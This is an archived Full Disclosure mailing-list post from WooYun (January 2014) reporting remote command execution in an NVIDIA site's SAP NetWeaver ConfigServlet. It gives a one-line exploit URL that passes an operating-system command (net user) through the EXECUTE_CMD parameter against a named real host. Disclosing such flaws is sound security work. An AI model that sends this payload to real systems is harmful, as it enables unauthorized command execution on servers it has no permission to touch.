|
Full Disclosure
mailing list archives
[Wooyun] NVIDIA a SAP NETWEAVER remote command execution
From: "En.wooyun.org" <help.en () wooyun org>
Date: Wed, 8 Jan 2014 00:25:48 +0800
*Abstract:*
NVIDIA a subsite SAP NETWEAVER remote command execution.
*Details:*
url:
https://nvcare.nvidia.com/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=net%20user
*Proofs of concept:*
*[image: 内嵌图片 1]*
*Form:*
http://en.wooyun.org/bugs/wooyun-2013-041
--
WooYun, an Open and Free Vulnerability Reporting Platform
For more information, please visit *http://en.wooyun.org/about.php
<http://en.wooyun.org/about.php?>*
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
 By Date 
By Thread
Current thread:
- [Wooyun] NVIDIA a SAP NETWEAVER remote command execution En.wooyun.org (Jan 08)
| 
